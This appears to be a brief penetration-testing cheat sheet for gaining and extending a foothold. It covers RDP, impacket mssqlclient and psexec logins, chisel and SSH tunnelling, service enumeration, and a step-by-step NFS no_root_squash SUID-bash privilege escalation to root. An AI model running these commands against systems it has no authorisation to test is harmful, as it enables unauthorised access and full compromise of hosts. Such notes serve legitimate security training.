# Foothold quickstart

# rdp

xfreerdp /v:10.1.1.1 /u:user /p:password

# mssql console (impacket)

python3 mssqlclient.py -port 27900 user:password@10.1.1.1

# NFS share exported with root squashing disabled (no_root_squash)

  1. NFS Access
  2. Gain Low Privilege Shell
  3. Upload Bash Executable to the NFS share
  4. `sudo chown root bash && sudo chmod +s bash` — set the SUID bit on the uploaded binary through the NFS mount; this only works because root squashing is disabled on the export
  5. Login through SSH
  6. `./bash -p` — run the SUID bash; `-p` keeps the effective UID instead of dropping privileges
  7. rooted

# psexec.py (impacket)

python3 psexec.py administrator@10.1.1.1

# Port Forwarding (chisel)

https://github.com/jpillora/chisel

# Services

Once a foothold is established, enumerate listening services to find any that are not exposed publicly.

netstat -lepunt
ss -lepunt

# ssh tunnel

Forward a port from the remote server to your local machine (the second form uses a non-default SSH port):

ssh -L 6379:localhost:6379 user@mydomainwhatever.net
ssh -L 6379:localhost:6379 user@mydomainwhatever.net -p 2222